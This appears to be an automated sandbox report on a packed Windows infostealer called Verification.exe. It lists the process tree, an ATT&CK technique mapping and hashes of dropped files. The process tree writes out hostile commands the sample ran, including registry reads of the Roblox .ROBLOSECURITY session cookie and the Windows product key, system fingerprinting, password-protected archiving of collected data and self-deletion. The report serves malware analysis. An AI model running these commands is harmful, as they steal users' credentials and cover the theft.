  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:1544
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:2032
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:4544
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:4456
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:1444
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:5680
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4964"
      4⤵
      PID:5588
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4964
        5⤵
        Kills process with taskkill
        
        PID:2504
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4964"
      4⤵
      PID:1180
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4964
        5⤵
        Kills process with taskkill
        
        PID:5828
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3912"
      4⤵
      PID:4820
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3912
        5⤵
        Kills process with taskkill
        
        PID:4336
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3912"
      4⤵
      PID:1120
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3912
        5⤵
        Kills process with taskkill
        
        PID:3448
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4728"
      4⤵
      PID:2080
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4728
        5⤵
        Kills process with taskkill
        
        PID:3296
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4728"
      4⤵
      PID:3116
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4728
        5⤵
        Kills process with taskkill
        
        PID:4700
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4760"
      4⤵
      PID:3168
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4760
        5⤵
        Kills process with taskkill
        
        PID:3692
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4760"
      4⤵
      PID:5764
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4760
        5⤵
        Kills process with taskkill
        
        PID:5804
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5032"
      4⤵
      PID:1404
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 5032
        5⤵
        Kills process with taskkill
        
        PID:4288
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5032"
      4⤵
      PID:908
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 5032
        5⤵
        Kills process with taskkill
        
        PID:4396
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3476"
      4⤵
      PID:4636
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:1796
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3476
        5⤵
        Kills process with taskkill
        
        PID:6024
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3476"
      4⤵
      PID:5400
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3476
        5⤵
        Kills process with taskkill
        
        PID:3812
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1968"
      4⤵
      PID:3036
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1968
        5⤵
        Kills process with taskkill
        
        PID:4352
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1968"
      4⤵
      PID:5936
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1968
        5⤵
        Kills process with taskkill
        
        PID:32
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1200"
      4⤵
      PID:4744
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1200
        5⤵
        Kills process with taskkill
        
        PID:4720
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1200"
      4⤵
      PID:5284
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1200
        5⤵
        Kills process with taskkill
        
        PID:2296
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:1676
    - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3356
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:5668
    - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1000
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "getmac"
      4⤵
      PID:748
    - - C:\Windows\system32\getmac.exe
        
        getmac
        5⤵
        
        PID:2492
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI31442\rar.exe a -r -hp"." "C:\Users\Admin\AppData\Local\Temp\o6a2a.zip" *"
      4⤵
      PID:3204
    - - C:\Users\Admin\AppData\Local\Temp\_MEI31442\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI31442\rar.exe a -r -hp"." "C:\Users\Admin\AppData\Local\Temp\o6a2a.zip" *
        5⤵
        Executes dropped EXE
        
        PID:1456
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
      4⤵
      PID:4144
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        5⤵
        
        PID:5720
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
      4⤵
      PID:1864
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        5⤵
        
        PID:3292
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:3180
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:5740
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
      4⤵
      PID:3296
    - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:872
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:1900
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:2552
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
      4⤵
      PID:5424
    - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5068
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\Verification.exe""
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      PID:4832
    - - C:\Windows\system32\PING.EXE
        
        ping localhost -n 3
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3916

Network

MITRE ATT&CK Enterprise v16

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
414B

MD5
ab41441bfdb58992b7f6c19de1dd7a50

SHA1
c6e169f4c233efa974a05dc1392b8befdfbc8397

SHA256
b541fca1feff2bd02715a9c033467f00b315fb4b5f82dec0bed2b0f7e5bd1272

SHA512
b73d06930bb54cf555466118b2fecf904e36c29f372adc041db2b8582145186b62211415bf48523b1d1428824886c9cf5e45869706a613bea212ac65b6ab41dc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
120B

MD5
22051008beed35a42a060fddca83762a

SHA1
f81907862de013326d17c4cd8092e087fae47f57

SHA256
327311610ad08f59fb3bde43be1983e25c020817611533992fe6dc482a9340e8

SHA512
378a3f12aba56ee65316a169a37e35bfa0ae32cffbc1d4f5859b0d3da948c27a939c74e9cfac0fb7fa03045f57a9465c3c0d4531324e90847cf72e79eb95bdd9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
96B

MD5
c989bb6e579e6d82f806feef0d6667a9

SHA1
bc3fcd965680aa598c3e3738367fdd76ab747178

SHA256
85ed7826602ec54c1459e90e6a6e9123783f383783cb950008aff49170b4355e

SHA512
a3f8cf5ed9918ec420bdfe0f68926f1b817f677a1750d75b19dc8d8e94ecac181055d07ed2d27a17633e214809180ee0c82a9ffb94ca3983340ba0f1a3f6986e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
120B

MD5
a7556b47a872629941ac1b8b4314cb09

SHA1
50bfc59d388b090a8d3ed39b40cf4f9c2f172c19

SHA256
9a7fe2856ef03d5980241b1886d836df610a6528b9a8adc9f7fed84ffaa77f52

SHA512
3d38908b8a6243aa964de5ac337c15873dea513aab8cb269a70ed473fd3affeff30effefa3bbfe6e14adfb2393899b22a3f0e69bc29b1fb689cef50ab3cad18f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log

Filesize
398B

MD5
c72a0c8d7d529b4f321565b6f456b307

SHA1
4a445e2d639bcbf1ada8da5f33849075416b7ba9

SHA256
77cd4cef1d409863bf353a4cf3cda0571149a18346c0e6fbb109efce76d5c4ea

SHA512
4ca65824b21d72797756a0913bc9d6e4d9934353476fcdbc26e0a84f08c5069153ab8793da2ec7e27a64cefad1cdc195788422c4155904cec8455c6ce91592b0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
77d53e7e25f634e7c8aa0000417a3f15

SHA1
2da138ce762b45306d8fd74bd72013fc4901c5a7

SHA256
907d63623e2d419e5896874bf2fc01fb4bd5ec6b696ad174a219c35145f67725

SHA512
a3c236673b68f359af10f7b1b66ddc0bfcafbd00fd3b60b4f2d646c46266c981e879ff8a04100ca7a82c1d26404585dbcbcda983c27fe1d2536da8cf030e1d40

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
aff1b5b5ac7b72b9cefe633203fa84dd

SHA1
7bb071ce9abe95ca5c19a7b0363278d953752ea9

SHA256
b820273ae795e847a3395b164b16394fe0aa3713af246eee101ba26c9c4b6243

SHA512
d7cb4ce2c7f25a9bb02dcef67421d289ebd4bd79eb25c2185066f84d816625a6347cf0ded3a1ef9a1da4721f820e818708b8d75c9fc2a3fab09e74f4178fd98b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
5a7e6009ebf05a7813fb4d049f832599

SHA1
5c980671c6688edc23ea52a5d8321893a64ae5c6

SHA256
1295a66e6640c1b6d1dfd069150d00007768076478a13157e287ce505ee0540d

SHA512
ffa7a703567820f54f926f3f4fec23d3623301978630bc9c26541dacb461c22f156fd38c7b4194e000eee786744805a986c567420bad57e710e8b2c09882e74d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
1a38ad1d9250acc728038d104c193043

SHA1
26592bfe582ffb74ffff9bc95c24fc3258957054

SHA256
59c0e5015bec8758302ddd36330657a47b885e25c21f5c49e59c6a0646f9cc7a

SHA512
19966b7a3adaa96d454cd35b92f0486bff02121141805a36e080b140204303adf5caffe368474ff745d83f6be76f319a4bcb9d954410112b87133ab8e9146c6b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
e464440b23c28edc6f6a2ec239681690

SHA1
2d7dd3a5886ec25e79ceed3cbf7aa5973bccf9b3

SHA256
1d2a055b31ce0b25580299c2a8f15d150def857adc57741b544079e7ac63aa7b

SHA512
a010feedc6ab6b31724c27621cdfec5612361a3efab124ccba2e80d736e59d041d04365142885f762e862995d16c30de2e1a8e64602db33f727fbce282ef5299

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
946e4935d945c2dc3cf84cb6d06e3604

SHA1
ac72f5c32e16db4c0b0adb2068615b9a61fd9f3e

SHA256
834dc068f39b65171c50e0e8e8445b4c3b97b2cddbc64e4b546cc1061a9052a9

SHA512
0792c7da8a5d62ed5bdd45567c64031afda2ce4f17a9e0a3ea84f6f63c1f008771af97c0660fdedd5170e36d4a498e05c7d6fa269a9922906925966d0ace3a72

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
35615dcaeb110f6d7b713fd5ad254fc3

SHA1
bd355d6b55f0d3ad0e506e32d7e111bf8a082223

SHA256
53b3e15330167bc44802c28e7c282292032617ed4d458776085aaae1783b0f31

SHA512
c187b511021805b6c9059e278d915300613ea44bea390a838441aff9fcff28429cbb1a912bd8ed1c44d0f6b8c101a3eff4b9c5fc0580116f49b363dbcbb9f953

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
6d319c42533779b59ec6f438510123f6

SHA1
8aa5ef36280e3888d324a63084a99b7425fc1d20

SHA256
bb56ad2231fa6bb479fa1777b7aacc6548710b09dbaa3e606eac5f7f4e7179d3

SHA512
d37f259fca4f103d7e9a843a6f5bdc43d6133da163b1fb35e9b3f7d4209fb58c92b96b33f5fc7cd66f8c1ef2dfbc329dbbbe40d94f30c193ba860c4b03edfe48

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
72B

MD5
53b2a6547782f743653ca3253b2c90c4

SHA1
527556b6d1de0348f69cef1edd6b49902aa43a64

SHA256
64f394523424c934b8e6833d05afc93492ebc358d5706b48a3e3ae0eee5a30e4

SHA512
b854648524c2158d4271ffd8d4b7c7ef1dbc403dc889fb659c32f0f022d97a7ff4ccb952f0a2c88f2534cc4b42b0e64c98cac41a64ec86243fa6865a247011c3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe57cc1a.TMP

Filesize
48B

MD5
d744d11b36b47ed07d0797d4a9ad0397

SHA1
d7497fc516f4fa1638c78fcabf039319d2e59279

SHA256
601b6200fcba1c2ce71ad0e9d8accc7cc156ec3d1dac22be9b947b5a955eb25a

SHA512
6e12784628f36bb530e95c2c7c24b109ec48b29fb35fd4f17aacedbf34d9c6de0825e0a2a0837b4fd516dd5a5e8b07834d6d1d166c7cb063cb05ead567555021

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
153KB

MD5
71459d396c39009b9288112a11af58d4

SHA1
f32c1b1c33a5617c2f6d2fccd5af8ce65fdb19ed

SHA256
786959fe7a272d8cccba1b982d4d8dd8a2c2ce7458f9ed4f3f5fe0023f4e2e15

SHA512
c8ee22142d55b2c1e1cc1097008cfc43ad26dfe990d63c82a631ff6d86accce8bb708d2e8fc61957a39e1b60dc2ba9e9f1dfacf6614a71d1ad30d94bf5c5120a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
152KB

MD5
c00c111303dcc98f344b91237c3fdf9b

SHA1
e96d46c9d82130a5f0325d070721b69a34a7729b

SHA256
fe24ffc80d0f0a8a771c4ba1d96d81040663ccc42359a538070e7be6ba4f3360

SHA512
8c269fdb8b4da50894dbb206d46ef12b4616241b42fd72120dcbe91c4f8f02848e0af7c1e600a7a6a32cce1ceeee4955db13e4b8ec0fe8388a84253c1bc0f6f5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
152KB

MD5
6b7f229034cbd636945984c3f10db9eb

SHA1
257f831e22dffffec68fae3d2a8dcba4bbc97f2f

SHA256
f8cb26269aecf6448e4b03528b8b2e9d04f98c48ef50c42f3b4ac47ad8ac0d3f

SHA512
93380c5b872fa0384adc23dc306e4078e8f918512773e42df30ad4af0f9ca7e00deae21eab9d6ca9ef385a290cb7c19d98e22cc6fde4139de0ef6aa1f17d5cd8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
78KB

MD5
0c39e7aa13d8e535a103f4673891f0af

SHA1
33469fe9eb916d7126067ba53554c2a2a8de343d

SHA256
e7ad2e18225c23859550c1618b6e68b88608065fca5761064b179b0fd79698ea

SHA512
0cadb1acdd6376fbcfad7d2c836bcf6e5e20a7b7823e8a89fb03aa50c79b9ff2647ee671d1ae0efb7fbf24445abe668b4923c12f88928b1da217c507e8dd633d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
a1a5cd54a073fcc6f996c5bf8eae9ab4

SHA1
f51b3b1fe5ec1ace8641c99d2769a0f9f93f640f

SHA256
d0cc04ed0b546b1d7f405da38b5c1addd1fbc26591027e76b9745a9c1daf584e

SHA512
6804bc8a338f7727396b107ee58e418dae2c086aa85c8edb4d4a90f7398963dc63bab06574ed8b3c593e76d7740ecacec63d1643c6f26058a5d947caafb7673c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Verification.exe

Filesize
7.6MB

MD5
748f1e1a2ed945aea774e1b8d7a1d2ff

SHA1
703db35ad6b5b660d71c8629bcd3744985a23e93

SHA256
816fa06f66e7225eb2492380978eb80204cc6b5ad8c609d9f436c9ba0fc9e635

SHA512
204cd4f57807693b123c509f02a9648ee573dc08a310ce8f3513073b9e0da676b94d07293fc859827f115ce4ab2e1a1900c35057de466c4e195bcba4dc0f00ed

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31442\VCRUNTIME140.dll

Filesize
117KB

MD5
862f820c3251e4ca6fc0ac00e4092239

SHA1
ef96d84b253041b090c243594f90938e9a487a9a

SHA256
36585912e5eaf83ba9fea0631534f690ccdc2d7ba91537166fe53e56c221e153

SHA512
2f8a0f11bccc3a8cb99637deeda0158240df0885a230f38bb7f21257c659f05646c6b61e993f87e0877f6ba06b347ddd1fc45d5c44bc4e309ef75ed882b82e4e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31442\_bz2.pyd

Filesize
50KB

MD5
94309558eb827e8315d0f201bbe7f2b1

SHA1
b0a511995528860239b595774a1912e8f1220c42

SHA256
fe14d1af436b07370607c6798c3eb15fc439837cc9cbe7cbc3271b07c9ed55b6

SHA512
1163da89470b4f4f11786961d2b24a0c01939a174415fac8321f402d85c067572f18d7a8f43ec8abdcc6f14dc76f780ec36004ac34593988240f6a7642e60365

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31442\_ctypes.pyd

Filesize
64KB

MD5
fc40d41aff12417142c0256e536b4a1a

SHA1
237157d6af4ec643c4d8480cf3d332951a791cc1

SHA256
0712d9412ea0d276c9a726765c072e00146f5aea853818d177b1a5b425839641

SHA512
b7625a5325a5b184b1733931dc3857ea5c118d85a506875dcb6b195c2372723b9c6cf80e4688c0fc1383ea063c9d831dd4c0e10ec429dd0f363aa678b1c99f6b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31442\_decimal.pyd

Filesize
119KB

MD5
0e02b5bcde73a3cc01534fba80ec0462

SHA1
decd14b79adf47cc74085beed8a997552d97b965

SHA256
286c99901c103d39c3e79bf30ce06f2825260e04ef7d2f0d77fcc08fb93e1d4b

SHA512
9556fbd408a5f5e0c21212cda2e2c164cd5093bb8668c152db4b72d03944f1f172ac8e0e194b3eedd1d4697ca2e7d50fcc77fe47014eda14ab658648005cb338

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31442\_hashlib.pyd

Filesize
36KB

MD5
933a6a12d695c7d91ef78a936ab229c7

SHA1
ff16c267921ed4dd7f2a129df675a2bc6a52be2a

SHA256
60d239d691eb3e31d99848ba9167b5797c897b2896fa5605e61f5bce08e9cb11

SHA512
fd5416529061851e90aba6782e1550d9c48d0b10d39f52bd3ff984fbb88d0c06ee54675108508aad819d49362fb6ba74e9d3ad6dd0f3aa17654a07cae6ae099a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31442\_lzma.pyd

Filesize
87KB

MD5
042ac1b18a7f6fff8ed09ec9efa9e724

SHA1
643f3dca141f8fea4609b50907e910be960ce38a

SHA256
491b8a4f143c7a505e7c36a2279e84aca902e65a1e28aa6d50bcc37dbf6b5334

SHA512
940a44363d385e4e9fa23c06cf6d013d2585424e6a174e2afbdaa5a0cd21836a5df438859eff45a3b6e70e47322d8c8c5fa5d83315be34cfd6769e8fc2084a21

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31442\_queue.pyd

Filesize
27KB

MD5
1073d3147f0d6a1880b78a5a5695fc70

SHA1
d97b690c490a51182e9757c15d14dfefd840e746

SHA256
65ad239871835a3823401647b2dad935075b4e33a5913fd12d7f2a02b6c49d82

SHA512
45d046d2e702447aa00bada25d76fe17c3a4c8822ac62739fe820e9eac66c5262323d66ad90cddde31dd01ecd6db0128cd96950e9857c9c5c59524027c75255f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31442\_socket.pyd

Filesize
45KB

MD5
fcfdf8cd83a8d506a4483a72eb57026c

SHA1
74428908c0068c3de2f4281aba16c13cdd28be04

SHA256
2a6b686817b640dcabc58e60289d9ace9ace3e4bc217d78953439549cee65a8a

SHA512
3b63e08370fa76ca8c81fc7639492367d250d507f0fb7e0e582078997ba2fa246c48eeaa9faed866dface4fcb08319096a83048dc333ad4be21947f5146b1768

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31442\_sqlite3.pyd

Filesize
59KB

MD5
1e16d084725d9b79f17ccb1996df7410

SHA1
3c49ba7b3acf317eedaa7c75319f1b39f91b79ba

SHA256
cc17586da3a099b45644ce76cd53ffcb3f5836e9db213152e3a880569c50ca7a

SHA512
4932f891e386792a03f6340ac7c9fe9dfd52e6f4a948951520c24b5f6204b26e3fc9455658e52efdce188a98c1e0f33d86493547dad47517ffafb9bb2c088549

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31442\_ssl.pyd

Filesize
68KB

MD5
0a56191c7fb0ae4f75de0859aeba458f

SHA1
6b1c4d1906bea388c6690fe93f12013db959a4f9

SHA256
e07199062e32fb086f8cb35c36239f1bdfe15ea10f72864fed1953dc0c2dd61c

SHA512
014b18a33f7ed88f4c326a7981ec670c197d1fba54f7e050c64fe409551cdc89e8fc3ce7205cd8f45cc548c6982e00049e03ea2aeb2360b1c85ce9beb1aa8410

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31442\base_library.zip

Filesize
1.3MB

MD5
aa10b6873bcb9772f9f11d1c21d4b069

SHA1
86b3bb2cbd2e9e10a6af8c3597aaa77ca9d324e9

SHA256
01ee80a748203e72b78eef861df2941dfdefd4ae00db08cc59e7e0f7080e278f

SHA512
7eca4b8a587674ea8b9245583e84b350e5b604e6b2f8c04e2126ec7098ff325d8a3e0a3c272a5d274c3a660dfa206e5d6cc82b851812cc3b369207fc32db920d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31442\blank.aes

Filesize
112KB

MD5
234b02ec6c7a0c9d42f62f8bfe583d9c

SHA1
95becafc0e5a3db5bca185987537b2437cb1d80d

SHA256
0526f10760526df1197ff4ffd9b4345175affaf98cbf2b1bfc75ce2d10e04ddc

SHA512
9c6890a76bac05916b9db7e23f62e651295f06458ebae8fa43e81aeb286bf7d63928b7a840e6c6379a219f5bf7ac4251e2868dc4da89efefb1473c583dbd5990

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31442\libcrypto-3.dll

Filesize
1.6MB

MD5
8377fe5949527dd7be7b827cb1ffd324

SHA1
aa483a875cb06a86a371829372980d772fda2bf9

SHA256
88e8aa1c816e9f03a3b589c7028319ef456f72adb86c9ddca346258b6b30402d

SHA512
c59d0cbe8a1c64f2c18b5e2b1f49705d079a2259378a1f95f7a368415a2dc3116e0c3c731e9abfa626d12c02b9e0d72c98c1f91a359f5486133478144fa7f5f7

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31442\libffi-8.dll

Filesize
29KB

MD5
08b000c3d990bc018fcb91a1e175e06e

SHA1
bd0ce09bb3414d11c91316113c2becfff0862d0d

SHA256
135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece

SHA512
8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31442\libssl-3.dll

Filesize
221KB

MD5
b2e766f5cf6f9d4dcbe8537bc5bded2f

SHA1
331269521ce1ab76799e69e9ae1c3b565a838574

SHA256
3cc6828e7047c6a7eff517aa434403ea42128c8595bf44126765b38200b87ce4

SHA512
5233c8230497aadb9393c3ee5049e4ab99766a68f82091fe32393ee980887ebd4503bf88847c462c40c3fc786f8d179dac5cb343b980944ade43bc6646f5ad5a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31442\python313.dll

Filesize
1.8MB

MD5
2a4aad7818d527bbea76e9e81077cc21

SHA1
4db3b39874c01bf3ba1ab8659957bbc28aab1ab2

SHA256
4712a6bb81b862fc292fcd857cef931ca8e4c142e70eaa4fd7a8d0a96aff5e7e

SHA512
d10631b7fc25a8b9cc038514e9db1597cec0580ee34a56ce5cfc5a33e7010b5e1df7f15ec30ebb351356e2b815528fb4161956f26b5bfaf3dce7bc6701b79c68

Download Submit
